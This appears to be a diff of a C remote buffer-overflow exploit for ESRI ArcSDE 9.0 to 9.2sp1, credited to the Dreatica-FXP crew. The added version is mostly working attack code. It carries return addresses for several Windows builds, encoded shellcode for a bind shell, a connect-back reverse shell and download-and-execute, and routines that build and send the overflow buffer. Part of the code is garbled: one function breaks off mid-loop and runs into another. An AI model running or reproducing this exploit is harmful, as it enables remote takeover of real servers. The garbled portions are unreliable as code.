if (optind == 0) - optind++; - - if (optind >= argc || argv[optind][0] != '-' || argv[optind][1] == '\0') - { - optarg = NULL; - if (optind < argc) - optarg = argv[optind]; - return EOF; - } - - if (strcmp(argv[optind], "--") == 0) - { - optind++; - optarg = NULL; - if (optind < argc) - optarg = argv[optind]; - return EOF; - } - - next = argv[optind]; - next++; // skip past - - optind++; - } - - char c = *next++; - char *cp = strchr(optstring, c); - - if (cp == NULL || c == ':') - return '?'; - - cp++; - if (*cp == ':') 
- { - if (*next != '\0') - { - optarg = next; - next = NULL; - } - else if (optind < argc) - { - optarg = argv[optind]; - optind++; - } - else - { - return '?'; - } - } - - return c; -} -// ----------------------------------------------------------------- -// ----------------------------------------------------------------- -// ----------------------------------------------------------------- - - -void usage(char * s) -{ - printf(" Usage : %s -h -p -s -t -I -P -u \n", s); - printf(" Arguments:\n"); - printf(" -h host to connect\n"); - printf(" -p port (default: 5151)\n"); - printf(" -s select shellcode (default: 1)\n"); - printf(" -t target to attack\n"); - printf(" -I reverse IP for the connect-back shellcode\n"); - printf(" -P reverse port for the connect-back shellcode\n"); - printf(" -u url for executable for DAX shellcode\n\n"); - printf(" Shellcodes:\n"); - for(int i=0; shellcodes[i].name!=0;i++) - { - printf(" %d. %s\n",i+1,shellcodes[i].name); - } - printf("\n"); - printf(" Targets:\n"); - for(int j=0; targets[j].t!=0;j++) - { - printf(" %d. 
%s\n",j+1,targets[j].t); - } - printf("\n"); - end_logo(); -} - -void logo() -{ - printf("\n\n"); - printf(" ####################################################################### \n"); - printf(" # ____ __ _ ______ __ _____ #\n"); - printf(" # / __ \\________ _____/ /_(_)_________ / __/\\ \\/ / / _ / #\n"); - printf(" # / / / / ___/ _ \\/ __ / __/ / ___/ __ / ___ / / \\ / / // / #\n"); - printf(" # / /_/ / / / ___/ /_// /_/ / /__/ /_// /__/ / _/ / \\ / ___/ #\n"); - printf(" # /_____/_/ \\___/ \\_,_/\\__/_/\\___/\\__,_/ /_/ /_/\\_\\/_/ #\n"); - printf(" # crew #\n"); - printf(" ####################################################################### \n"); - printf(" # Exploit : ESRI ArcSDE 9.0 - 9.2sp1 Remote Buffer Overflow # \n"); - printf(" # Solution: ESRI ArcSDE 9.2 sp2 is invulnerable # \n"); - printf(" # Author : Heretic2 (heretic2x@gmail.com # \n"); - printf(" # THANKS : iDefense, Zero-tolerance, Metasploit project and anghell # \n"); - printf(" # Research: iDefense # \n"); - printf(" # Version : 1.0 Public Release # \n"); - printf(" # System : Windows ALL # \n"); - printf(" # Date : 26.06.2007 # \n"); - printf(" # ------------------------------------------------------------------- # \n"); -} - -void end_logo() -{ - printf(" # ------------------------------------------------------------------- # \n"); - printf(" # Dreatica-FXP crew [Heretic2] # \n"); - printf(" ####################################################################### \n\n"); -} - -// milw0rm.com [2007-07-03] +/* Dreatica-FXP crew +* +* ---------------------------------------- +* Target : ESRI ArcSDE 9.0 - 9.2sp1 +* Site : http://www.esri.com +* Found by : iDefense, http://labs.idefense.com/intelligence/vulnerabilities/ +* ---------------------------------------- +* Exploit : ESRI ArcSDE 9.0 - 9.2sp1 Remote Buffer Overflow exploit +* Exploit date : 26.06.2007 +* Exploit writer : Heretic2 (heretic2x@gmail.com) +* OS : Windows ALL +* Crew : Dreatica-FXP +* 
---------------------------------------- +* Info : Trivially exploitable stack overflow vulnerability: if we send more than 516 bytes to +* server, we can overwrite EIP. After the EIP gets overwritten we can see that the ESP +* points to the next bytes of buffer after EIP, so we simply write shellcode at 520 byte. +* The server allows any type of buffer even with the 0x00 bytes, so have fun! +* For use universal RET's you need to find the ArcSDE version (this is not a trivial job :P) +* +* Seems that the earlier versions are also vulnerable. To protect the server against that +* vulnerability you need to install ArcSDE 9.2sp2. +* ---------------------------------------- +* Compiling : +* To compile this exploit you need: +* 1. Windows C/C++ compiler +* 2. WinSock 2 +* ---------------------------------------- +* Thanks to : +* 1. iDefense ( http://labs.idefense.com/intelligence/vulnerabilities/ ) +* 2. The Metasploit project ( http://metasploit.com ) +* 3. ALPHA 2: Zero-tolerance ( ) +* 4. anghell at Dreatica-FXP ( ) +* 5. Dreatica-FXP crew ( http://www.dreatica.cl ) +* ---------------------------------------- +* This exploit was written for educational purpose only. Use it at your own risk. Author will be not be +* responsible for any damage, caused by that code. 
+************************************************************************************ +*/ + +#include +#include +#include +#include +#include +#pragma comment(lib,"ws2_32") + + +void usage(char * s); +void logo(); +void end_logo(); +void prepare_shellcode(unsigned char * fsh, int sh, char * cbip, int cbport, char * url); +void make_buffer(unsigned char * buf, unsigned int * len, int itarget, int sh, char * cbip, int cbport, char * url); +int get_version(char * remotehost, int port); +int send_buffer(unsigned char * buf, unsigned int len, char * remotehost, int port); +SOCKET do_connect (char *remotehost, int port); +SOCKET do_connect_async (char *remotehost, int port); +int alphanumeric_encoder_thx_to_skylined(char *to_encode, char *encoded ); + +static long timeout = 2000 ; // 2 sec + + +// ----------------------------------------------------------------- +// XGetopt.cpp Version 1.2 +// ----------------------------------------------------------------- +int getopt(int argc, char *argv[], char *optstring); +char *optarg; // global argument pointer +int optind = 0, opterr; // global argv index +// ----------------------------------------------------------------- +// ----------------------------------------------------------------- + + + +struct _target{ + const char *t ; + unsigned long ret ; +} targets[]= + { + {"UNIV: AcrSDE 9.0 [sdesqlsrvr90.dll] ( MSSQL )", 0x1015c357 },// jmp esp + {"UNIV: AcrSDE 9.1 [sdesqlsrvr91.dll] ( MSSQL )", 0x1015e3e7 },// jmp esp + {"UNIV: AcrSDE 9.2 [sdesqlsrvr92.dll] ( MSSQL )", 0x1008d742 },// jmp esp + {"Windows XP SP0 RUSSIAN [shell32.dll]", 0x77a96758 },// jmp esp + {"Windows XP SP1 RUSSIAN [advapi32.dll]", 0x77e1d9d3 },// jmp esp + {"Windows XP SP2 RUSSIAN [shell32.dll]", 0x7d16817f },// jmp esp + {"Windows XP SP2 ENGLISH [ole32.dll]", 0x77548952 },// jmp esp + {"Windows XP SP2 DUTCH [ntdll.dll]", 0x7c941eed },// jmp esp + {"Windows 2003 SP0 ENGLISH [shell32.dll]", 0x77add723 },// jmp esp + {"Debug / DoS", 0x42424242 }, + {NULL, 
0x00000000 } + }; + + +struct { + const char * name; + int length; + char * shellcode; +}shellcodes[]={ + {"Bindshell, port 4444 [ args: none ]", 696, + /* win32_bind - EXITFUNC=seh LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com */ + "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x37\x49\x49\x49" + "\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x42" + "\x58\x50\x30\x42\x31\x41\x42\x6b\x42\x41\x52\x42\x32\x42\x41\x32" + "\x41\x41\x30\x41\x41\x58\x50\x38\x42\x42\x75\x6a\x49\x4b\x4c\x62" + "\x4a\x68\x6b\x30\x4d\x59\x78\x49\x69\x4b\x4f\x79\x6f\x69\x6f\x71" + "\x70\x4e\x6b\x32\x4c\x51\x34\x64\x64\x6e\x6b\x41\x55\x77\x4c\x4c" + "\x4b\x71\x6c\x35\x55\x64\x38\x54\x41\x58\x6f\x4c\x4b\x30\x4f\x47" + "\x68\x4e\x6b\x53\x6f\x47\x50\x74\x41\x58\x6b\x70\x49\x4c\x4b\x35" + "\x64\x6c\x4b\x36\x61\x68\x6e\x57\x41\x79\x50\x6f\x69\x4c\x6c\x6c" + "\x44\x4b\x70\x63\x44\x43\x37\x5a\x61\x78\x4a\x44\x4d\x36\x61\x6a" + "\x62\x38\x6b\x78\x74\x77\x4b\x51\x44\x74\x64\x76\x48\x51\x65\x4a" + "\x45\x4e\x6b\x73\x6f\x61\x34\x55\x51\x5a\x4b\x71\x76\x6c\x4b\x64" + "\x4c\x72\x6b\x4e\x6b\x63\x6f\x57\x6c\x75\x51\x7a\x4b\x33\x33\x34" + "\x6c\x6c\x4b\x6e\x69\x72\x4c\x45\x74\x45\x4c\x30\x61\x4f\x33\x50" + "\x31\x69\x4b\x61\x74\x6c\x4b\x57\x33\x66\x50\x4e\x6b\x43\x70\x64" + "\x4c\x6e\x6b\x32\x50\x65\x4c\x6e\x4d\x6e\x6b\x77\x30\x67\x78\x31" + "\x4e\x33\x58\x6c\x4e\x30\x4e\x34\x4e\x5a\x4c\x50\x50\x4b\x4f\x69" + "\x46\x72\x46\x62\x73\x70\x66\x35\x38\x57\x43\x35\x62\x45\x38\x30" + "\x77\x63\x43\x44\x72\x71\x4f\x71\x44\x79\x6f\x4a\x70\x73\x58\x78" + "\x4b\x48\x6d\x4b\x4c\x77\x4b\x56\x30\x79\x6f\x7a\x76\x51\x4f\x6f" + "\x79\x79\x75\x32\x46\x4b\x31\x48\x6d\x43\x38\x45\x52\x70\x55\x73" + "\x5a\x33\x32\x6b\x4f\x4a\x70\x72\x48\x69\x49\x36\x69\x4c\x35\x6e" + "\x4d\x50\x57\x4b\x4f\x6a\x76\x36\x33\x36\x33\x61\x43\x33\x63\x62" + "\x73\x43\x73\x36\x33\x50\x43\x63\x63\x4b\x4f\x68\x50\x43\x56\x71" + "\x78\x62\x31\x51\x4c\x30\x66\x30\x53\x6b\x39\x78\x61\x4c\x55\x65" + 
"\x38\x4e\x44\x67\x6a\x74\x30\x6f\x37\x70\x57\x69\x6f\x6e\x36\x32" + "\x4a\x36\x70\x43\x61\x32\x75\x79\x6f\x4e\x30\x50\x68\x4f\x54\x6e" + "\x4d\x64\x6e\x6d\x39\x52\x77\x79\x6f\x58\x56\x66\x33\x36\x35\x69" + "\x6f\x4e\x30\x45\x38\x38\x65\x72\x69\x6b\x36\x77\x39\x33\x67\x79" + "\x6f\x6e\x36\x70\x50\x31\x44\x62\x74\x73\x65\x6b\x4f\x58\x50\x6d" + "\x43\x50\x68\x4b\x57\x44\x39\x4f\x36\x64\x39\x71\x47\x6b\x4f\x49" + "\x46\x63\x65\x6b\x4f\x4a\x70\x71\x76\x50\x6a\x50\x64\x50\x66\x70" + "\x68\x50\x63\x52\x4d\x6e\x69\x58\x65\x32\x4a\x46\x30\x63\x69\x45" + "\x79\x48\x4c\x4c\x49\x7a\x47\x63\x5a\x70\x44\x4d\x59\x78\x62\x36" + "\x51\x39\x50\x38\x73\x4f\x5a\x6b\x4e\x41\x52\x64\x6d\x6b\x4e\x32" + "\x62\x36\x4c\x4e\x73\x4c\x4d\x43\x4a\x34\x78\x4c\x6b\x6e\x4b\x6e" + "\x4b\x51\x78\x70\x72\x6b\x4e\x4e\x53\x47\x66\x4b\x4f\x32\x55\x50" + "\x44\x4b\x4f\x7a\x76\x43\x6b\x70\x57\x62\x72\x46\x31\x66\x31\x32" + "\x71\x30\x6a\x35\x51\x33\x61\x32\x71\x33\x65\x53\x61\x4b\x4f\x5a" + "\x70\x30\x68\x6e\x4d\x6e\x39\x73\x35\x7a\x6e\x62\x73\x4b\x4f\x48" + "\x56\x63\x5a\x6b\x4f\x59\x6f\x57\x47\x39\x6f\x6e\x30\x4e\x6b\x30" + "\x57\x59\x6c\x4b\x33\x38\x44\x45\x34\x59\x6f\x39\x46\x50\x52\x39" + "\x6f\x58\x50\x65\x38\x38\x70\x6e\x6a\x37\x74\x53\x6f\x31\x43\x6b" + "\x4f\x6a\x76\x6b\x4f\x78\x50\x42" + }, + + + {"ReverseShell [ args: -I -P ]", 316, + "\xEB\x10\x5B\x4B\x33\xC9\x66\xB9\x25\x01\x80\x34\x0B\xC2\xE2\xFA" + "\xEB\x05\xE8\xEB\xFF\xFF\xFF" + "\x2B\x39\xC2\xC2\xC2\x9D\xA6\x63\xF2\xC2\xC2\xC2\x49\x82\xCE\x49" + "\xB2\xDE\x6F\x49\xAA\xCA\x49\x35\xA8\xC6\x9B\x2A\x59\xC2\xC2\xC2" + "\x20\x3B\xAA\xF1\xF0\xC2\xC2\xAA\xB5\xB1\xF0\x9D\x96\x3D\xD4\x49" + "\x2A\xA8\xC6\x9B\x2A\x40\xC2\xC2\xC2\x20\x3B\x43\x2E\x52\xC3\xC2" + "\xC2\x96\xAA\xC3\xC3\xC2\xC2\x3D\x94\xD2\x92\x92\x92\x92\x82\x92" + "\x82\x92\x3D\x94\xD6\x49\x1A\xAA\xBD\xC2\xC2\xC3\xAA\xC0\xC2\xC2" + "\xF7\x49\x0E\xA8\xD2\x93\x91\x3D\x94\xDA\x47\x02\xB7\x88\xAA\xA1" + "\xAF\xA6\xC2\x4B\xA4\xF2\x41\x2E\x96\x4F\xFE\xE6\xA8\xD7\x9B\x69" + 
"\x20\x3F\x04\x86\xE6\xD2\x86\x3C\x86\xE6\xFF\x4B\x9E\xE6\x8A\x4B" + "\x9E\xE6\x8E\x4B\x9E\xE6\x92\x4F\x86\xE6\xD2\x96\x92\x93\x93\x93" + "\xA8\xC3\x93\x93\x3D\xB4\xF2\x93\x3D\x94\xC6\x49\x0E\xA8\x3D\x3D" + "\xF3\x3D\x94\xCA\x91\x3D\x94\xDE\x3D\x94\xCE\x93\x94\x49\x87\xFE" + "\x49\x96\xEA\xBA\xC1\x17\x90\x49\xB0\xE2\xC1\x37\xF1\x0B\x8B\x83" + "\x6F\xC1\x07\xF1\x19\xCD\x7C\xD2\xF8\x14\xB6\xCA\x03\x09\xCF\xC1" + "\x18\x82\x29\x33\xF9\xDD\xB7\x25\x98\x49\x98\xE6\xC1\x1F\xA4\x49" + "\xCE\x89\x49\x98\xDE\xC1\x1F\x49\xC6\x49\xC1\x07\x69\x9C\x9B\x01" + "\x2A\xC2\x3D\x3D\x3D\x4C\x8C\xCC\x2E\xB0\x3C\x71\xD4\x6F\x1B\xC7" + "\x0C\xBC\x1A\x20\xB1\x09\x2F\x3E\xF9\x1B\xCB\x37\x6F\x2E\x3B\x68" + "\xA2\x25\xBB\x04\xBB" + }, + {"Download and execute [ args: -u ]", 729, + /* win32_download_exec - http://metasploit.com */ + /* encoded by "ALPHA 2: Zero-tolerance. */ + "\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" + "\x49\x37\x51\x5A\x6A\x41\x58\x50\x30\x41\x30\x41\x6B\x41\x41\x51" + "\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42" + "\x75\x4A\x49\x58\x6B\x36\x70\x71\x4A\x33\x7A\x76\x53\x59\x59\x71" + "\x76\x38\x39\x57\x4C\x35\x51\x6B\x30\x74\x74\x74\x4A\x6E\x79\x39" + "\x72\x7A\x5A\x78\x6B\x36\x65\x4D\x38\x7A\x4B\x4B\x4F\x4B\x4F\x4B" + "\x4F\x54\x30\x50\x4C\x4E\x79\x6C\x59\x5A\x39\x4F\x33\x79\x6D\x55" + "\x68\x6C\x69\x5A\x39\x4E\x79\x4A\x39\x34\x52\x58\x59\x6E\x75\x54" + "\x52\x4B\x59\x6D\x55\x36\x54\x45\x42\x7A\x79\x6F\x61\x56\x72\x53" + "\x71\x34\x52\x5A\x4A\x6D\x75\x76\x72\x4A\x4D\x4E\x67\x4D\x31\x6F" + "\x6A\x72\x4A\x36\x72\x6B\x57\x4E\x59\x4F\x6A\x33\x52\x76\x72\x6E" + "\x37\x4C\x4D\x6F\x5A\x74\x34\x7A\x6F\x48\x4E\x79\x58\x55\x42\x4D" + "\x76\x4C\x5A\x73\x52\x74\x52\x32\x4B\x6B\x43\x4C\x57\x49\x50\x52" + "\x4A\x75\x6F\x7A\x4D\x4A\x31\x69\x50\x59\x56\x54\x5A\x51\x4E\x4F" + "\x6D\x69\x4C\x33\x4B\x64\x30\x4B\x70\x6F\x36\x6B\x77\x54\x52\x73" + "\x64\x62\x32\x79\x4F\x4D\x6D\x6E\x7A\x70\x5A\x73\x78\x70\x78\x4F" + 
"\x6A\x62\x78\x6D\x7A\x50\x50\x4B\x4F\x75\x42\x4A\x31\x75\x42\x4B" + "\x6F\x6F\x75\x4D\x4A\x61\x4A\x52\x78\x52\x58\x4D\x4B\x6E\x7A\x50" + "\x58\x66\x72\x4D\x49\x6D\x4A\x51\x4A\x56\x72\x55\x33\x62\x32\x50" + "\x6E\x55\x4A\x51\x4F\x4E\x77\x75\x42\x63\x79\x49\x63\x4D\x4D\x39" + "\x50\x32\x51\x4B\x79\x4D\x49\x6D\x49\x6E\x79\x76\x7A\x51\x4F\x4C" + "\x54\x68\x4B\x78\x4F\x71\x76\x6A\x6E\x55\x35\x59\x53\x77\x62\x53" + "\x71\x4B\x43\x4E\x78\x39\x50\x31\x61\x59\x34\x4D\x49\x4C\x59\x6E" + "\x79\x46\x7A\x71\x4F\x6F\x7A\x6A\x6F\x69\x4F\x74\x59\x4D\x77\x77" + "\x69\x78\x6C\x73\x53\x37\x69\x6E\x4F\x37\x69\x7A\x67\x75\x4A\x73" + "\x45\x6E\x59\x75\x42\x71\x55\x6B\x43\x78\x39\x4B\x7A\x45\x36\x68" + "\x4E\x73\x45\x31\x4E\x6D\x4D\x4F\x6A\x39\x55\x79\x68\x6E\x57\x4B" + "\x4C\x51\x4E\x6B\x6D\x4F\x6A\x4D\x4D\x38\x61\x79\x6C\x6C\x59\x6A" + "\x39\x4F\x5A\x70\x59\x4B\x79\x79\x59\x6A\x6A\x4A\x6F\x39\x59\x73" + "\x56\x48\x4E\x53\x55\x55\x42\x71\x55\x6B\x79\x6A\x6A\x50\x66\x48" + "\x4E\x65\x39\x6A\x69\x65\x36\x78\x4E\x50\x6D\x6F\x5A\x52\x79\x30" + "\x35\x35\x4C\x50\x59\x4A\x4C\x31\x70\x58\x48\x78\x4B\x78\x4F\x6A" + "\x6A\x52\x46\x50\x4B\x68\x43\x6B\x70\x74\x72\x73\x4B\x70\x77\x4F" + "\x5A\x56\x39\x73\x6A\x61\x61\x4D\x6F\x63\x56\x43\x56\x75\x36\x4B" + "\x6E\x79\x6C\x7A\x4D\x6F\x39\x78\x6B\x58\x76\x6B\x4A\x78\x58\x4B" + "\x4D\x6B\x4D\x5A\x4B\x4B\x4C\x4A\x4A\x7A\x4A\x5A\x39\x59\x4E\x6B" + "\x4C\x48\x6D\x5A\x6A\x6B\x50\x4B\x5A\x5A\x4D\x4B\x4C\x4B\x44\x6B" + "\x6D\x6C\x30\x4A\x4B\x6B\x4C\x79\x6A\x58\x6D\x59\x66\x5A\x4B\x59" + "\x70\x68\x58\x4D\x49\x7A\x6E\x6A\x50\x4C\x37\x4B\x6C\x6D\x31\x6B" + "\x4C\x6B\x4A\x6C\x59\x4B\x6C\x6B\x51\x5A\x50\x48\x6D\x4A\x6D\x68" + "\x71\x4A\x4B\x79\x6C\x59\x68\x6B\x4D\x4F\x69\x6E\x35\x4B\x46\x6B" + "\x48\x4B\x4D\x4E\x35\x78\x70\x6B\x4B\x4A\x4B\x7A\x58\x48\x6B\x4B" + "\x50\x4A\x78\x4C\x59\x4A\x4C\x4A\x4B\x6A\x55\x59\x64\x4C\x36\x6B" + "\x47\x4E\x79\x68\x4C\x38\x4B\x7A\x75\x4B\x6D\x79\x66\x7A\x4E\x4B" + "\x47\x39\x65\x4A\x56\x58\x78\x4B\x4D\x7A\x6D\x4C\x36\x59\x4F\x78" 
+ "\x70\x7A\x55\x39\x6c\x6e\x38\x6d\x49"
+ },
+ {NULL , NULL }
+};
+
+
+
+int main(int argc, char **argv)
+{
+ char * remotehost=NULL, * cbip=NULL, *url=NULL;
+ char default_remotehost[]="127.0.0.1";
+ char default_cbip[]="127.0.0.1";
+ char temp1[100], temp2[100];
+ int cbport, port, itarget, sh;
+ char ss[100];
+ SOCKET s;
+ char c;
+ int option_index=0;
+ logo();
+ WSADATA wsa;
+ WSAStartup(MAKEWORD(2,0), &wsa);
+ if(argc<2)
+ {
+ usage(argv[0]);
+ return -1;
+ }
+
+ // set defaults
+ cbport=4444;
+ port=5151;
+ itarget=-1;
+ sh=0;
+ // ------------
+
+ while((c = getopt(argc, argv, "h:p:s:t:I:P:u:"))!= EOF)
+ {
+ switch (c)
+ {
+ case 'h':
+ remotehost=optarg;
+ break;
+ case 's':
+ sscanf(optarg, "%d", &sh);
+ sh--;
+ break;
+ case 't':
+ sscanf(optarg, "%d", &itarget);
+ itarget--;
+ break;
+ case 'p':
+ sscanf(optarg, "%d", &port);
+ break;
+ case 'P':
+ sscanf(optarg, "%d", &cbport);
+ break;
+ case 'I':
+ cbip=optarg;
+ break;
+ case 'u':
+ url=optarg;
+ break;
+ default:
+ usage(argv[0]);
+ WSACleanup();
+ return -1;
+ }
+ }
+ if(remotehost == NULL) remotehost=default_remotehost;
+ if(cbip == NULL) cbip=default_cbip;
+ if(url == NULL) url="";
+ memset(temp1,0,sizeof(temp1));
+ memset(temp2,0,sizeof(temp2));
+ memset(temp1, '\x20' , 58 - strlen(remotehost) -1);
+ printf(" # Host : %s%s# \n", remotehost, temp1);
+ sprintf(temp2, "%d", port);
+ memset(temp1,0,sizeof(temp1));
+ memset(temp1, '\x20' , 58 - strlen(temp2) -1);
+ printf(" # Port : %s%s# \n", temp2, temp1);
+ memset(temp1,0,sizeof(temp1));
+ memset(temp2,0,sizeof(temp2));
+ sprintf(temp2, "%s", shellcodes[sh].name );
+ memset(temp1, '\x20' , 58 - strlen(temp2) -1);
+ printf(" # Payload : %s%s# \n", temp2, temp1);
+ if(itarget!=-1)
+ {
+ memset(temp1,0,sizeof(temp1));
+ memset(temp1, '\x20' , 58 - strlen(targets[itarget].t) -1);
+ printf(" # Target : %s%s# \n", targets[itarget].t, temp1);
+ }else
+ {
+ memset(temp1,0,sizeof(temp1));
+ memset(temp1, '\x20' , 58 - strlen("Please select target") -1);
+ printf(" # Target : %s%s# \n", "Please select target", temp1);
+ }
+ if(sh==1)
+ {
+ memset(temp1,0,sizeof(temp1));
+ memset(temp1, '\x20' , 58 - strlen(cbip) -1);
+ printf(" # CB IP : %s%s# \n", cbip, temp1);
+ sprintf(temp2, "%d", cbport);
+ memset(temp1,0,sizeof(temp1));
+ memset(temp1, '\x20' , 58 - strlen(temp2) -1);
+ printf(" # CB port : %s%s# \n", temp2, temp1);
+ }
+ printf(" # ------------------------------------------------------------------- # \n");
+ fflush(stdout);
+ printf(" [+] Checking if server is online\n");
+ fflush(stdout);
+ s=do_connect(remotehost, port);
+ if(s==-1)
+ {
+ printf(" [-] Server is OFFLINE\n");
+ end_logo();
+ return 0;
+ }
+ closesocket(s);
+ printf(" [+] Server is ONLINE\n");
+
+ if(itarget==-1)
+ {
+ itarget = get_version(remotehost, port);
+ if(itarget>=0)
+ {
+ printf(" [+] Target: %s%\n", targets[itarget].t);
+ }else
+ {
+ printf(" [-] Please select target\n");
+ WSACleanup();
+ end_logo();
+ return -1;
+ }
+ }
+
+ unsigned char buf[10000];
+ unsigned int len;
+ memset(buf,0,sizeof(buf));
+ fflush(stdout);
+ make_buffer(buf, &len, itarget, sh, cbip, cbport, url);
+
+ printf(" [+] Attacking buffer constructed\n");
+
+ if(send_buffer(buf, len, remotehost,port)==-1)
+ {
+ printf(" [-] Cannot exploit server %s\n", remotehost);
+ end_logo();
+ WSACleanup();
+ return -1;
+ }
+
+ printf(" [+] Buffer sent\n");
+
+ if(sh==0)sprintf(ss, " [+] Connect to %s:%d\n", remotehost, 4444);
+ if(sh==1)sprintf(ss, " [+] The shell should arrive at %s:%d\n", cbip, cbport);
+ if(sh==2)sprintf(ss, " [+] File is downloaded and executred\n");
+ printf("%s", ss);
+ end_logo();
+ WSACleanup();
+ return 0;
+}
+
+
+
+SOCKET do_connect (char *remotehost, int port)
+{
+ static struct hostent *host;
+ static struct sockaddr_in addr;
+ SOCKET s;
+ host = gethostbyname(remotehost);
+ if (!host)
+ {
+ perror("[-] gethostbyname() failed");
+ return -1;
+ }
+ addr.sin_addr = *(struct in_addr*)host->h_addr;
+
+ s = socket(PF_INET, SOCK_STREAM, 0);
+ if (s == -1)
+ {
+ closesocket(s);
+ perror("socket() failed");
+ return -1;
+ }
+
+ addr.sin_port = htons(port);
+ addr.sin_family = AF_INET;
+
+ if (connect(s, (struct sockaddr*)&addr, sizeof(addr)) == -1)
+ {
+ closesocket(s);
+ return -1;
+ }
+
+
+ return s;
+}
+
+SOCKET do_connect_async (char *remotehost, int port)
+{
+ static struct hostent *host;
+ static struct sockaddr_in addr;
+ SOCKET s;
+ host = gethostbyname(remotehost);
+ if (!host)
+ {
+ perror("[-] gethostbyname() failed");
+ return -1;
+ }
+ addr.sin_addr = *(struct in_addr*)host->h_addr;
+
+ s = socket(PF_INET, SOCK_STREAM, 0);
+ if (s == -1)
+ {
+ closesocket(s);
+ perror("socket() failed");
+ return -1;
+ }
+
+
+ unsigned long l = 1;
+ if ( ioctlsocket( s, FIONBIO, &l ) != 0 )
+ {
+ fprintf( stderr, "Failed setting socket to non-blocking mode\n" );
+ closesocket( s );
+ return -1;
+ }
+
+
+ addr.sin_port = htons(port);
+ addr.sin_family = AF_INET;
+
+ if ( connect( s, (sockaddr*) &addr, sizeof( sockaddr ) ) == SOCKET_ERROR )
+ {
+ int error = WSAGetLastError( );
+ if ( ( error != WSAEWOULDBLOCK ) && ( error != WSAEINPROGRESS ) )
+ {
+ fprintf( stderr, "Failed connecting to remote host, %d\n", error );
+ closesocket( s );
+ return -1;
+ }
+ }
+
+ return s;
+}
+
+
+
+
+
+
+// get arcsde version to determine target
+int get_version(char * remotehost, int port)
+{
+ // ----------------------------------------
+ // removed due to publicity of the exploit
+ // ----------------------------------------
+ return -1;
+}
+
+
+
+
+
+
+void prepare_shellcode(unsigned char * fsh, unsigned int * fshlength, int sh, char * cbip, int cbport, char *url)
+{
+ memcpy(fsh, shellcodes[sh].shellcode, shellcodes[sh].length);
+ *fshlength = shellcodes[sh].length;
+ if(sh==1)
+ {
+ static struct hostent *host = gethostbyname(cbip);
+ static struct sockaddr_in addr;
+ addr.sin_addr = *(struct in_addr*)host->h_addr;
+ fsh[111] = (addr.sin_addr.S_un.S_un_b.s_b1) ^ 0xc2;
+ fsh[112] = (addr.sin_addr.S_un.S_un_b.s_b2) ^ 0xc2;
+ fsh[113] = (addr.sin_addr.S_un.S_un_b.s_b3) ^ 0xc2;
+ fsh[114] = (addr.sin_addr.S_un.S_un_b.s_b4) ^ 0xc2;
+
+ fsh[118] = ((cbport >> 8) & 0xff) ^ 0xc2;
+ fsh[119] = ((cbport ) & 0xff) ^ 0xc2;
+ }
+ if(sh==2)
+ {
+ char locurl[1000];
+ memset(locurl,0,sizeof(locurl));
+ memcpy(locurl, url, strlen(url));
+ locurl[strlen(locurl)]='\x80';
+ char encoded_url[2500] ;
+ alphanumeric_encoder_thx_to_skylined(locurl, encoded_url);
+ strcat((char *)fsh, encoded_url);
+ *fshlength += (unsigned int)strlen(encoded_url);
+ }
+}
+
+void make_buffer(unsigned char * buf, unsigned int * len, int itarget, int sh, char * cbip, int cbport, char * url)
+{
+ // prepare shellcode
+ unsigned char fsh[10000];
+ unsigned int fshlength;
+ memset(fsh, 0, sizeof(fsh));
+ prepare_shellcode(fsh, &fshlength, sh, cbip, cbport, url);
+ // -----------------
+
+ // make buffer
+ unsigned char * cp=buf;
+
+ // long buffer
+ *cp++='\x80';
+ memset(cp, '\x41', 515);
+ cp+=515;
+
+ //replace EIP
+ *cp++ = (char)((targets[itarget].ret ) & 0xff);
+ *cp++ = (char)((targets[itarget].ret >> 8) & 0xff);
+ *cp++ = (char)((targets[itarget].ret >> 16) & 0xff);
+ *cp++ = (char)((targets[itarget].ret >> 24) & 0xff);
+
+ // jff
+ *cp++ = '\x90';
+ *cp++ = '\x90';
+ *cp++ = '\x90';
+ *cp++ = '\x90';
+
+ // copy shellcode
+ memcpy(cp, fsh, fshlength);
+ cp+=fshlength;
+
+ // set the length manually cause of the 0x00 bytes
+ *len = (unsigned int)(cp-buf);
+ // -----------------
+}
+
+
+
+int send_buffer(unsigned char * buf, unsigned int len, char * remotehost, int port)
+{
+ SOCKET sock;
+ char str[1000];
+ int bytes;
+ char bufmax[4096];
+
+ sock = do_connect_async(remotehost, port);
+ if(sock==-1)
+ {
+ printf(" [-] Failed to connect to server\n");
+ }
+ fd_set fdConnect = { 0 };
+
+ TIMEVAL stTime;
+ TIMEVAL *pstTime = NULL;
+ long dwTimeout=5000;
+ if (INFINITE != dwTimeout)
+ {
+ stTime.tv_sec = dwTimeout / 1000;
+ stTime.tv_usec = dwTimeout % 1000;
+ pstTime = &stTime;
+ }
+ if (!FD_ISSET(sock, &fdConnect))
+ FD_SET(sock, 
&fdConnect); + + int res = select(NULL, NULL, &fdConnect, NULL, pstTime); + if(res==0) + { + closesocket(sock); + return -1; + } + if(res<0) + { + closesocket(sock); + return -1; + } + + bytes = send(sock, (char *)buf, len, 0); + Sleep(500); + printf(" [+] Sent %d bytes to server\n", bytes); + + fd_set active_set, read_set; + + FD_ZERO(&active_set); + FD_SET(sock, &active_set); + + read_set = active_set; + res = select(FD_SETSIZE,&read_set,NULL,NULL, pstTime); + + if (res==0) + { + closesocket(sock); + return 1; + } + + if ( res<0 ) { + closesocket(sock); + return -1; + } + + for (int i=0; i> 4; + B = (input & 0x0f); + F = B; + i = rand() % ((int)strlen(valid_chars)); + while ((valid_chars[i] & 0x0f) != F) { i = ++i % ((int)strlen(valid_chars)); } + E = valid_chars[i] >> 4; + D = (A^E); + i = rand() % ((int)strlen(valid_chars)); + while ((valid_chars[i] & 0x0f) != D) { i = ++i % ((int)strlen(valid_chars)); } + C = valid_chars[i] >> 4; + sprintf(temp,"%c%c", (C<<4)+D, (E<<4)+F); + encoded[strlen(encoded)]=temp[0]; + encoded[strlen(encoded)]=temp[1]; + } + encoded[strlen(encoded)]='A'; + return 0; +} + + + + +// ----------------------------------------------------------------- +// XGetopt.cpp Version 1.2 +// ----------------------------------------------------------------- +int getopt(int argc, char *argv[], char *optstring) +{ + static char *next = NULL; + if (optind == 0) + next = NULL; + + optarg = NULL; + + if (next == NULL || *next == '\0') + { + if (optind == 0) + 